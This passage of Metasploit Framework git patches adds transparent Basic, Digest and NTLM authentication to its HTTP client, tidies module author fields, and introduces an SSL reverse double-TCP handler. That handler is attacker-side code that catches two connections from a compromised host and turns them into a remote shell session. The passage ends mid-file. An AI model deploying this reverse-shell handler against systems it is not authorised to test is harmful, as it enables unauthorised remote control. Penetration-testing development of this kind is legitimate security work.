'uri_fake_end' => false, # bool 'uri_fake_params_start' => false, # bool 'header_folding' => false, # bool - 'chunked_size' => 0 # integer + 'chunked_size' => 0, # integer + # + # NTLM Options + # + 'usentlm2_session' => true, + 'use_ntlmv2' => true, + 'send_lm' => true, + 'send_ntlm' => true, + 'SendSPN' => true, + 'UseLMKey' => false, + 'domain' => 'WORKSTATION' } # This is not used right now... @@ -298,7 +311,7 @@ def request_cgi(opts={}) req << set_raw_headers(c_rawh) req << set_body(pstr) - req + {:string => req , :opts => opts} end # @@ -347,7 +360,16 @@ def close # to reuse an existing connection. # def send_recv(req, t = -1, persist=false) + res = _send_recv(req,t,persist) + if res and res.code == 401 and res.headers['WWW-Authenticate'] and have_creds? + send_auth(res, opts, t, persist) + end + end + + def _send_recv(req, t = -1, persist=false) @pipeline = persist + opts = req[:opts] + req = req[:string] send_request(req, t) res = read_response(t) res.request = req.to_s if res @@ -362,6 +384,271 @@ def send_request(req, t = -1) conn.put(req.to_s) end + def have_creds? + !(self.username.nil?) && self.username != '' + end + + def send_auth(res, opts, t, persist) + supported_auths = res.headers['WWW-Authenticate'] + if supported_auths.include? 'Basic' + opts['basic_auth'] = self.username.to_s + ':' + self.password.to_s + req = request_cgi(opts) + res = _send_recv(req,t,persist) + return res + elsif supported_auths.include? "Digest" + opts['DigestAuthUser'] = self.username.to_s + opts['DigestAuthPassword'] = self.password.to_s + temp_response = digest_auth(opts) + if temp_response.kind_of? Rex::Proto::Http::Response + res = temp_response + end + return res + elsif supported_auths.include? "NTLM" + opts['provider'] = 'NTLM' + temp_response = negotiate_auth(opts) + if temp_response.kind_of? Rex::Proto::Http::Response + res = temp_response + end + return res + elsif supported_auths.include? "Negotiate" + opts['provider'] = 'Negotiate' + temp_response = negotiate_auth(opts) + if temp_response.kind_of? Rex::Proto::Http::Response + res = temp_response + end + return res + end + end + + def digest_auth(opts={}) + @nonce_count = 0 + + digest_user = opts['DigestAuthUser'] || "" + digest_password = opts['DigestAuthPassword'] || "" + + method = opts['method'] + path = opts['uri'] + iis = true + if (opts['DigestAuthIIS'] == false or datastore['DigestAuthIIS'] == false) + iis = false + end + + begin + @nonce_count += 1 + + resp = opts['response'] + + if not resp + # Get authentication-challenge from server, and read out parameters required + r = request_cgi(opts.merge({ + 'uri' => path, + 'method' => method })) + resp = _send_recv(r, to) + unless resp.kind_of? Rex::Proto::Http::Response + return nil + end + + if resp.code != 401 + return resp + end + return resp unless resp.headers['WWW-Authenticate'] + end + + # Don't anchor this regex to the beginning of string because header + # folding makes it appear later when the server presents multiple + # WWW-Authentication options (such as is the case with IIS configured + # for Digest or NTLM). + resp['www-authenticate'] =~ /Digest (.*)/ + + parameters = {} + $1.split(/,[[:space:]]*/).each do |p| + k, v = p.split("=", 2) + parameters[k] = v.gsub('"', '') + end + + qop = parameters['qop'] + + if parameters['algorithm'] =~ /(.*?)(-sess)?$/ + algorithm = case $1 + when 'MD5' then Digest::MD5 + when 'SHA1' then Digest::SHA1 + when 'SHA2' then Digest::SHA2 + when 'SHA256' then Digest::SHA256 + when 'SHA384' then Digest::SHA384 + when 'SHA512' then Digest::SHA512 + when 'RMD160' then Digest::RMD160 + else raise Error, "unknown algorithm \"#{$1}\"" + end + algstr = parameters["algorithm"] + sess = $2 + else + algorithm = Digest::MD5 + algstr = "MD5" + sess = false + end + + a1 = if sess then + [ + algorithm.hexdigest("#{digest_user}:#{parameters['realm']}:#{digest_password}"), + parameters['nonce'], + @cnonce + ].join ':' + else + "#{digest_user}:#{parameters['realm']}:#{digest_password}" + end + + ha1 = algorithm.hexdigest(a1) + ha2 = algorithm.hexdigest("#{method}:#{path}") + + request_digest = [ha1, parameters['nonce']] + request_digest.push(('%08x' % @nonce_count), @cnonce, qop) if qop + request_digest << ha2 + request_digest = request_digest.join ':' + + # Same order as IE7 + auth = [ + "Digest username=\"#{digest_user}\"", + "realm=\"#{parameters['realm']}\"", + "nonce=\"#{parameters['nonce']}\"", + "uri=\"#{path}\"", + "cnonce=\"#{@cnonce}\"", + "nc=#{'%08x' % @nonce_count}", + "algorithm=#{algstr}", + "response=\"#{algorithm.hexdigest(request_digest)[0, 32]}\"", + # The spec says the qop value shouldn't be enclosed in quotes, but + # some versions of IIS require it and Apache accepts it. Chrome + # and Firefox both send it without quotes but IE does it this way. + # Use the non-compliant-but-everybody-does-it to be as compatible + # as possible by default. The user can override if they don't like + # it. + if qop.nil? then + elsif iis then + "qop=\"#{qop}\"" + else + "qop=#{qop}" + end, + if parameters.key? 'opaque' then + "opaque=\"#{parameters['opaque']}\"" + end + ].compact + + headers ={ 'Authorization' => auth.join(', ') } + headers.merge!(opts['headers']) if opts['headers'] + + # Send main request with authentication + r = request_cgi(opts.merge({ + 'uri' => path, + 'method' => method, + 'headers' => headers })) + resp = _send_recv(r, to) + unless resp.kind_of? Rex::Proto::Http::Response + return nil + end + + return resp + + rescue ::Errno::EPIPE, ::Timeout::Error + end + end + + def negotiate_auth(opts={}) + ntlm_options = { + :signing => false, + :usentlm2_session => self.config['usentlm2_session'], + :use_ntlmv2 => self.config['use_ntlmv2'], + :send_lm => self.config['send_lm'], + :send_ntlm => self.config['send_ntlm'] + } + + if opts['provider'] and opts['provider'].include? 'Negotiate' + provider = "Negotiate " + else + provider = 'NTLM ' + end + + opts['method']||= 'GET' + opts['headers']||= {} + + ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) + workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) + domain_name = self.config['domain'] + + b64_blob = Rex::Text::encode_base64( + NTLM_UTILS::make_ntlmssp_blob_init( + domain_name, + workstation_name, + ntlmssp_flags + )) + + ntlm_message_1 = provider + b64_blob + + begin + # First request to get the challenge + opts['headers']['Authorization'] = ntlm_message_1 + r = request_cgi(opts) + resp = _send_recv(r, to) + unless resp.kind_of? Rex::Proto::Http::Response + return nil + end + + return resp unless resp.code == 401 && resp.headers['WWW-Authenticate'] + + # Get the challenge and craft the response + ntlm_challenge = resp.headers['WWW-Authenticate'].scan(/#{provider}([A-Z0-9\x2b\x2f=]+)/i).flatten[0] + return resp unless ntlm_challenge + + ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) + blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) + + challenge_key = blob_data[:challenge_key] + server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error + default_name = blob_data[:default_name] || '' #netbios name + default_domain = blob_data[:default_domain] || '' #netbios domain + dns_host_name = blob_data[:dns_host_name] || '' #dns name + dns_domain_name = blob_data[:dns_domain_name] || '' #dns domain + chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' #Client time + + spnopt = {:use_spn => self.config['SendSPN'], :name => self.hostname} + + resp_lm, resp_ntlm, client_challenge, ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses( + opts['username'], + opts['password'], + challenge_key, + domain_name, + default_name, + default_domain, + dns_host_name, + dns_domain_name, + chall_MsvAvTimestamp, + spnopt, + ntlm_options + ) + + ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth( + domain_name, + workstation_name, + opts['username'], + resp_lm, + resp_ntlm, + '', + ntlmssp_flags + ) + + ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) + + # Send the response + opts['headers']['Authorization'] = "#{provider}#{ntlm_message_3}" + r = request_cgi(opts) + resp = _send_recv(r, to, true) + unless resp.kind_of? Rex::Proto::Http::Response + return nil + end + return resp + + rescue ::Errno::EPIPE, ::Timeout::Error + return nil + end + end # # Read a response from the server # @@ -839,6 +1126,9 @@ def set_formatted_header(var, val) # attr_accessor :proxies + # Auth + attr_accessor :username, :password + # When parsing the request, thunk off the first response from the server, since junk attr_accessor :junk_pipeline From efe09472860d6edcd66d730af664817dab88fff2 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Thu, 31 Jan 2013 14:01:24 -0600 Subject: [PATCH 233/421] Start fixing datastore options --- lib/msf/core/exploit/http/client.rb | 23 +++++++++++++++-------- lib/rex/proto/http/client.rb | 8 ++++++-- 2 files changed, 21 insertions(+), 10 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index b5df69ba248c..8e8e05dadb4a 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -16,7 +16,6 @@ module Msf module Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Exploit::Remote::NTLM::Client - include Exploit::Remote::HttpAuth # # Constants @@ -38,7 +37,9 @@ def initialize(info = {}) Opt::RHOST, Opt::RPORT(80), OptString.new('VHOST', [ false, "HTTP server virtual host" ]), - Opt::Proxies + Opt::Proxies, + OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication']), ], self.class ) @@ -47,10 +48,6 @@ def initialize(info = {}) OptString.new('UserAgent', [false, 'The User-Agent header to use for all requests', Rex::Proto::Http::Client::DefaultUserAgent ]), - OptString.new('BasicAuthUser', [false, 'The HTTP username to specify for basic authentication']), - OptString.new('BasicAuthPass', [false, 'The HTTP password to specify for basic authentication']), - OptString.new('DigestAuthUser', [false, 'The HTTP username to specify for digest authentication']), - OptString.new('DigestAuthPassword', [false, 'The HTTP password to specify for digest authentication']), OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]), OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false]), OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'SSL3', ['SSL2', 'SSL3', 'TLS1']]), @@ -157,7 +154,9 @@ def connect(opts={}) }, dossl, ssl_version, - proxies + proxies, + datastore['USERNAME'], + datastore['PASSWORD'] ) # Configure the HTTP client with the supplied parameter @@ -185,7 +184,15 @@ def connect(opts={}) 'pad_post_params_count' => datastore['HTTP::pad_post_params_count'], 'uri_fake_end' => datastore['HTTP::uri_fake_end'], 'uri_fake_params_start' => datastore['HTTP::uri_fake_params_start'], - 'header_folding' => datastore['HTTP::header_folding'] + 'header_folding' => datastore['HTTP::header_folding'], + 'usentlm2_session' => datastore['NTLM::UseNTLM2_session'] + 'use_ntlmv2' => datastore['NTLM::UseNTLMv2'], + 'send_lm' => datastore['NTLM::SendLM'], + 'send_ntlm' => datastore['NTLM::SendNTLM'], + 'SendSPN' => datastore['NTLM::SendSPN'], + 'UseLMKey' => datastore['NTLM::UseLMKey'], + 'domain' => datastore['DOMAIN'], + 'DigestAuthIIS' => datastore['DigestAuthIIS'] ) # If this connection is global, persist it diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index ddc1d3b30e22..d544543d168f 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -74,7 +74,11 @@ def initialize(host, port = 80, context = {}, ssl = nil, ssl_version = nil, prox 'send_ntlm' => true, 'SendSPN' => true, 'UseLMKey' => false, - 'domain' => 'WORKSTATION' + 'domain' => 'WORKSTATION', + # + # Digest Options + # + 'DigestAuthIIS' => true } # This is not used right now... @@ -429,7 +433,7 @@ def digest_auth(opts={}) method = opts['method'] path = opts['uri'] iis = true - if (opts['DigestAuthIIS'] == false or datastore['DigestAuthIIS'] == false) + if (opts['DigestAuthIIS'] == false or self.config['DigestAuthIIS']) iis = false end From 61969d575b8753626236e41580e1f7d6a26f6a6e Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Thu, 31 Jan 2013 14:44:06 -0600 Subject: [PATCH 234/421] remove mixin require, more datastore clenaup --- lib/msf/core/exploit/http/client.rb | 14 +++++++++++--- lib/msf/core/exploit/mixins.rb | 1 - lib/rex/proto/http/client.rb | 3 ++- 3 files changed, 13 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 8e8e05dadb4a..808646a8435b 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -38,8 +38,8 @@ def initialize(info = {}) Opt::RPORT(80), OptString.new('VHOST', [ false, "HTTP server virtual host" ]), Opt::Proxies, - OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication']), - OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication']), + OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']), ], self.class ) @@ -185,7 +185,7 @@ def connect(opts={}) 'uri_fake_end' => datastore['HTTP::uri_fake_end'], 'uri_fake_params_start' => datastore['HTTP::uri_fake_params_start'], 'header_folding' => datastore['HTTP::header_folding'], - 'usentlm2_session' => datastore['NTLM::UseNTLM2_session'] + 'usentlm2_session' => datastore['NTLM::UseNTLM2_session'], 'use_ntlmv2' => datastore['NTLM::UseNTLMv2'], 'send_lm' => datastore['NTLM::SendLM'], 'send_ntlm' => datastore['NTLM::SendNTLM'], @@ -281,6 +281,14 @@ def send_request_cgi(opts={}, timeout = 20) end end + # + # Combine the user/pass into an auth string for the HTTP Client + # + def basic_auth + return if not datastore['USERNAME'] + datastore['USERNAME'].to_s + ":" + (datastore['PASSWORD'].to_s || '') + end + # # Authenticates to the remote host based on the most appropriate authentication method, # and returns the HTTP response. If there are multiple auth methods supported, then it diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb index 6e45892469bf..6b4db3a54ff6 100644 --- a/lib/msf/core/exploit/mixins.rb +++ b/lib/msf/core/exploit/mixins.rb @@ -37,7 +37,6 @@ require 'msf/core/exploit/tftp' require 'msf/core/exploit/telnet' require 'msf/core/exploit/ftpserver' -require 'msf/core/exploit/http/auth' require 'msf/core/exploit/http/client' require 'msf/core/exploit/http/server' require 'msf/core/exploit/smtp' diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index d544543d168f..50c354e688d4 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -366,8 +366,9 @@ def close def send_recv(req, t = -1, persist=false) res = _send_recv(req,t,persist) if res and res.code == 401 and res.headers['WWW-Authenticate'] and have_creds? - send_auth(res, opts, t, persist) + res = send_auth(res, opts, t, persist) end + res end def _send_recv(req, t = -1, persist=false) From 6c12fa26bc2c7dc476f7df7bc745a814116e9552 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Thu, 31 Jan 2013 16:49:52 -0600 Subject: [PATCH 235/421] oodles of small fixes Basic, NTLM and Negotiate auth all working transparently Have to test digest auth still --- lib/rex/proto/http/client.rb | 51 ++++++++++++++++++++++++------------ 1 file changed, 34 insertions(+), 17 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 50c354e688d4..267946f3399a 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -2,7 +2,11 @@ require 'rex/socket' require 'rex/proto/http' require 'rex/text' -require 'pry' +require 'digest' +require 'rex/proto/ntlm/crypt' +require 'rex/proto/ntlm/constants' +require 'rex/proto/ntlm/utils' +require 'rex/proto/ntlm/exceptions' module Rex module Proto @@ -244,7 +248,7 @@ def request_cgi(opts={}) c_host = opts['vhost'] || config['vhost'] c_conn = opts['connection'] c_path = opts['path_info'] - c_auth = opts['basic_auth'] || config['basic_auth'] || '' + uri = set_cgi(c_cgi) qstr = c_qs pstr = c_body @@ -301,10 +305,6 @@ def request_cgi(opts={}) req << set_host_header(c_host) req << set_agent_header(c_ag) - if (c_auth.length > 0) - req << set_basic_auth_header(c_auth) - end - req << set_cookie_header(c_cook) req << set_connection_header(c_conn) req << set_extra_headers(c_head) @@ -364,6 +364,8 @@ def close # to reuse an existing connection. # def send_recv(req, t = -1, persist=false) + opts = req[:opts] + req = req[:string] res = _send_recv(req,t,persist) if res and res.code == 401 and res.headers['WWW-Authenticate'] and have_creds? res = send_auth(res, opts, t, persist) @@ -372,9 +374,10 @@ def send_recv(req, t = -1, persist=false) end def _send_recv(req, t = -1, persist=false) + if req.kind_of? Hash and req[:string] + req = req[:string] + end @pipeline = persist - opts = req[:opts] - req = req[:string] send_request(req, t) res = read_response(t) res.request = req.to_s if res @@ -396,7 +399,12 @@ def have_creds? def send_auth(res, opts, t, persist) supported_auths = res.headers['WWW-Authenticate'] if supported_auths.include? 'Basic' - opts['basic_auth'] = self.username.to_s + ':' + self.password.to_s + if opts['headers'] + opts['headers']['Authorization'] = basic_auth_header(self.username,self.password) + else + opts['headers'] = { 'Authorization' => basic_auth_header(self.username,self.password)} + end + req = request_cgi(opts) res = _send_recv(req,t,persist) return res @@ -425,9 +433,16 @@ def send_auth(res, opts, t, persist) end end + def basic_auth_header(username,password) + auth_str = username.to_s + ":" + password.to_s + auth_str = "Basic " + Rex::Text.encode_base64(auth_str) + end + def digest_auth(opts={}) @nonce_count = 0 + to = opts['timeout'] || 20 + digest_user = opts['DigestAuthUser'] || "" digest_password = opts['DigestAuthPassword'] || "" @@ -448,7 +463,7 @@ def digest_auth(opts={}) r = request_cgi(opts.merge({ 'uri' => path, 'method' => method })) - resp = _send_recv(r, to) + resp = _send_recv(r, to, true) unless resp.kind_of? Rex::Proto::Http::Response return nil end @@ -545,7 +560,7 @@ def digest_auth(opts={}) 'uri' => path, 'method' => method, 'headers' => headers })) - resp = _send_recv(r, to) + resp = _send_recv(r, to, true) unless resp.kind_of? Rex::Proto::Http::Response return nil end @@ -565,6 +580,8 @@ def negotiate_auth(opts={}) :send_ntlm => self.config['send_ntlm'] } + to = opts['timeout'] || 20 + if opts['provider'] and opts['provider'].include? 'Negotiate' provider = "Negotiate " else @@ -574,12 +591,12 @@ def negotiate_auth(opts={}) opts['method']||= 'GET' opts['headers']||= {} - ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) + ntlmssp_flags = ::Rex::Proto::NTLM::Utils.make_ntlm_flags(ntlm_options) workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) domain_name = self.config['domain'] b64_blob = Rex::Text::encode_base64( - NTLM_UTILS::make_ntlmssp_blob_init( + ::Rex::Proto::NTLM::Utils::make_ntlmssp_blob_init( domain_name, workstation_name, ntlmssp_flags @@ -591,7 +608,7 @@ def negotiate_auth(opts={}) # First request to get the challenge opts['headers']['Authorization'] = ntlm_message_1 r = request_cgi(opts) - resp = _send_recv(r, to) + resp = _send_recv(r, to, true) unless resp.kind_of? Rex::Proto::Http::Response return nil end @@ -603,7 +620,7 @@ def negotiate_auth(opts={}) return resp unless ntlm_challenge ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) - blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) + blob_data = ::Rex::Proto::NTLM::Utils.parse_ntlm_type_2_blob(ntlm_message_2) challenge_key = blob_data[:challenge_key] server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error @@ -615,7 +632,7 @@ def negotiate_auth(opts={}) spnopt = {:use_spn => self.config['SendSPN'], :name => self.hostname} - resp_lm, resp_ntlm, client_challenge, ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses( + resp_lm, resp_ntlm, client_challenge, ntlm_cli_challenge = ::Rex::Proto::NTLM::Utils.create_lm_ntlm_responses( opts['username'], opts['password'], challenge_key, @@ -629,7 +646,7 @@ def negotiate_auth(opts={}) ntlm_options ) - ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth( + ntlm_message_3 = ::Rex::Proto::NTLM::Utils.make_ntlmssp_blob_auth( domain_name, workstation_name, opts['username'], From 8d817dcbb5b652e8f26afa452a97f1190f27db99 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Fri, 1 Feb 2013 15:49:18 -0600 Subject: [PATCH 236/421] fix iis digest support mistake Digest auth working automatically --- lib/rex/proto/http/client.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 267946f3399a..8c32ed3c2baf 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -449,7 +449,7 @@ def digest_auth(opts={}) method = opts['method'] path = opts['uri'] iis = true - if (opts['DigestAuthIIS'] == false or self.config['DigestAuthIIS']) + if (opts['DigestAuthIIS'] == false or self.config['DigestAuthIIS'] == false) iis = false end From e8def29b4f810a1fd7d8ac6643bceddbc9bad991 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Fri, 1 Feb 2013 16:33:44 -0600 Subject: [PATCH 237/421] Dropping all twitter handles Also adds "pbot" as an accepted lowercase word. This will come up pretty routinley for functions and stuff. --- modules/exploits/multi/misc/pbot_exec.rb | 2 +- modules/exploits/windows/browser/adobe_cooltype_sing.rb | 3 +-- modules/exploits/windows/browser/ms10_090_ie_css_clip.rb | 2 +- modules/exploits/windows/fileformat/adobe_cooltype_sing.rb | 3 +-- tools/msftidy.rb | 3 ++- 5 files changed, 6 insertions(+), 7 deletions(-) diff --git a/modules/exploits/multi/misc/pbot_exec.rb b/modules/exploits/multi/misc/pbot_exec.rb index fb3f1693f98c..90ebfa34a7c5 100644 --- a/modules/exploits/multi/misc/pbot_exec.rb +++ b/modules/exploits/multi/misc/pbot_exec.rb @@ -28,7 +28,7 @@ def initialize(info = {}) [ 'evilcry', # pbot analysis' 'Jay Turla', # pbot analysis - '@bwallHatesTwits', # PoC + 'bwall', # aka @bwallHatesTwits, PoC 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/adobe_cooltype_sing.rb b/modules/exploits/windows/browser/adobe_cooltype_sing.rb index 0a64ebeae492..e51ecadf6dce 100644 --- a/modules/exploits/windows/browser/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/browser/adobe_cooltype_sing.rb @@ -25,8 +25,7 @@ def initialize(info = {}) 'Author' => [ 'Unknown', # 0day found in the wild - '@sn0wfl0w', # initial analysis - '@vicheck', # initial analysis + 'sn0wfl0w', # initial analysis, also @vicheck on twitter 'jduck' # Metasploit module ], 'References' => diff --git a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb index cee5f962a616..a7ba46418a31 100644 --- a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb +++ b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb @@ -49,7 +49,7 @@ def initialize(info = {}) 'Author' => [ 'unknown', # discovered in the wild - '@yuange1975', # PoC posted to twitter + 'Yuange', # PoC posted to twitter under @yuange1975 'Matteo Memelli', # exploit-db version 'jduck' # Metasploit module ], diff --git a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb index a8ba842b7e16..2e2ad87d3fa1 100644 --- a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb @@ -25,8 +25,7 @@ def initialize(info = {}) 'Author' => [ 'Unknown', # 0day found in the wild - '@sn0wfl0w', # initial analysis - '@vicheck', # initial analysis + 'sn0wfl0w', # initial analysis, also @vicheck on twitter 'jduck' # Metasploit module ], 'References' => diff --git a/tools/msftidy.rb b/tools/msftidy.rb index aa63bea6a476..d2a17447f5fc 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -204,7 +204,7 @@ def check_badchars end if author_name =~ /^@.+$/ - error("No Twitter handle, please. Try leaving it in a comment instead.") + error("No Twitter handles, please. Try leaving it in a comment instead.") end if not author_name.ascii_only? @@ -281,6 +281,7 @@ def check_title_casing words.each do |word| if %w{and or the for to in of as with a an on at}.include?(word) next + elsif %w{pbot}.include?(word) elsif word =~ /^[a-z]+$/ warn("Improper capitalization in module title: '#{word}'") end From c3801ad08320fb53ad97d8e3f3682f958ffb2952 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 04:44:25 -0600 Subject: [PATCH 238/421] This adds an openssl CMD payload and handler --- .../core/handler/reverse_tcp_double_ssl.rb | 300 ++++++++++++++++++ .../singles/cmd/unix/reverse_openssl.rb | 58 ++++ 2 files changed, 358 insertions(+) create mode 100644 lib/msf/core/handler/reverse_tcp_double_ssl.rb create mode 100644 modules/payloads/singles/cmd/unix/reverse_openssl.rb diff --git a/lib/msf/core/handler/reverse_tcp_double_ssl.rb b/lib/msf/core/handler/reverse_tcp_double_ssl.rb new file mode 100644 index 000000000000..4410de7df77e --- /dev/null +++ b/lib/msf/core/handler/reverse_tcp_double_ssl.rb @@ -0,0 +1,300 @@ +# -*- coding: binary -*- +module Msf +module Handler + +### +# +# This module implements the reverse double TCP handler. This means +# that it listens on a port waiting for a two connections, one connection +# is treated as stdin, the other as stdout. +# +# This handler depends on having a local host and port to +# listen on. +# +### +module ReverseTcpDoubleSSL + + include Msf::Handler + + # + # Returns the string representation of the handler type, in this case + # 'reverse_tcp_double'. + # + def self.handler_type + return "reverse_tcp_double_ssl" + end + + # + # Returns the connection-described general handler type, in this case + # 'reverse'. + # + def self.general_handler_type + "reverse" + end + + # + # Initializes the reverse TCP handler and ads the options that are required + # for all reverse TCP payloads, like local host and local port. + # + def initialize(info = {}) + super + + register_options( + [ + Opt::LHOST, + Opt::LPORT(4444) + ], Msf::Handler::ReverseTcpDoubleSSL) + + register_advanced_options( + [ + OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]), + ], Msf::Handler::ReverseTcpDoubleSSL) + + self.conn_threads = [] + end + + # + # Starts the listener but does not actually attempt + # to accept a connection. Throws socket exceptions + # if it fails to start the listener. + # + def setup_handler + if datastore['Proxies'] and not datastore['ReverseAllowProxy'] + raise RuntimeError, 'TCP connect-back payloads cannot be used with Proxies. Can be overriden by setting ReverseAllowProxy to true' + end + self.listener_sock = Rex::Socket::TcpServer.create( + # 'LocalHost' => datastore['LHOST'], + 'LocalPort' => datastore['LPORT'].to_i, + 'Comm' => comm, + 'SSL' => true, + 'Context' => + { + 'Msf' => framework, + 'MsfPayload' => self, + 'MsfExploit' => assoc_exploit + }) + end + + # + # Closes the listener socket if one was created. + # + def cleanup_handler + stop_handler + + # Kill any remaining handle_connection threads that might + # be hanging around + conn_threads.each { |thr| + thr.kill + } + end + + # + # Starts monitoring for an inbound connection. + # + def start_handler + self.listener_thread = framework.threads.spawn("ReverseTcpDoubleSSLHandlerListener", false) { + sock_inp = nil + sock_out = nil + + print_status("Started reverse double handler") + + begin + # Accept two client connection + begin + client_a = self.listener_sock.accept + print_status("Accepted the first client connection...") + + client_b = self.listener_sock.accept + print_status("Accepted the second client connection...") + + sock_inp, sock_out = detect_input_output(client_a, client_b) + + rescue + wlog("Exception raised during listener accept: #{$!}\n\n#{$@.join("\n")}") + return nil + end + + # Increment the has connection counter + self.pending_connections += 1 + + # Start a new thread and pass the client connection + # as the input and output pipe. Client's are expected + # to implement the Stream interface. + conn_threads << framework.threads.spawn("ReverseTcpDoubleSSLHandlerSession", false, sock_inp, sock_out) { | sock_inp_copy, sock_out_copy| + begin + chan = TcpReverseDoubleSSLSessionChannel.new(framework, sock_inp_copy, sock_out_copy) + handle_connection(chan.lsock) + rescue + elog("Exception raised from handle_connection: #{$!}\n\n#{$@.join("\n")}") + end + } + end while true + } + end + + # + # Accept two sockets and determine which one is the input and which + # is the output. This method assumes that these sockets pipe to a + # remote shell, it should overridden if this is not the case. + # + def detect_input_output(sock_a, sock_b) + + begin + + # Flush any pending socket data + sock_a.get_once if sock_a.has_read_data?(0.25) + sock_b.get_once if sock_b.has_read_data?(0.25) + + etag = Rex::Text.rand_text_alphanumeric(16) + echo = "echo #{etag};\n" + + print_status("Command: #{echo.strip}") + + print_status("Writing to socket A") + sock_a.put(echo) + + print_status("Writing to socket B") + sock_b.put(echo) + + print_status("Reading from sockets...") + + resp_a = '' + resp_b = '' + + if (sock_a.has_read_data?(1)) + print_status("Reading from socket A") + resp_a = sock_a.get_once + print_status("A: #{resp_a.inspect}") + end + + if (sock_b.has_read_data?(1)) + print_status("Reading from socket B") + resp_b = sock_b.get_once + print_status("B: #{resp_b.inspect}") + end + + print_status("Matching...") + if (resp_b.match(etag)) + print_status("A is input...") + return sock_a, sock_b + else + print_status("B is input...") + return sock_b, sock_a + end + + rescue ::Exception + print_status("Caught exception in detect_input_output: #{$!}") + end + + end + + # + # Stops monitoring for an inbound connection. + # + def stop_handler + # Terminate the listener thread + if (self.listener_thread and self.listener_thread.alive? == true) + self.listener_thread.kill + self.listener_thread = nil + end + + if (self.listener_sock) + self.listener_sock.close + self.listener_sock = nil + end + end + +protected + + attr_accessor :listener_sock # :nodoc: + attr_accessor :listener_thread # :nodoc: + attr_accessor :conn_threads # :nodoc: + + + module TcpReverseDoubleSSLChannelExt + attr_accessor :localinfo + attr_accessor :peerinfo + end + + ### + # + # This class wrappers the communication channel built over the two inbound + # connections, allowing input and output to be split across both. + # + ### + class TcpReverseDoubleSSLSessionChannel + + include Rex::IO::StreamAbstraction + + def initialize(framework, inp, out) + @framework = framework + @sock_inp = inp + @sock_out = out + + initialize_abstraction + + self.lsock.extend(TcpReverseDoubleSSLChannelExt) + self.lsock.peerinfo = @sock_inp.getpeername[1,2].map{|x| x.to_s}.join(":") + self.lsock.localinfo = @sock_inp.getsockname[1,2].map{|x| x.to_s}.join(":") + + monitor_shell_stdout + end + + # + # Funnel data from the shell's stdout to +rsock+ + # + # +StreamAbstraction#monitor_rsock+ will deal with getting data from + # the client (user input). From there, it calls our write() below, + # funneling the data to the shell's stdin on the other side. + # + def monitor_shell_stdout + + # Start a thread to pipe data between 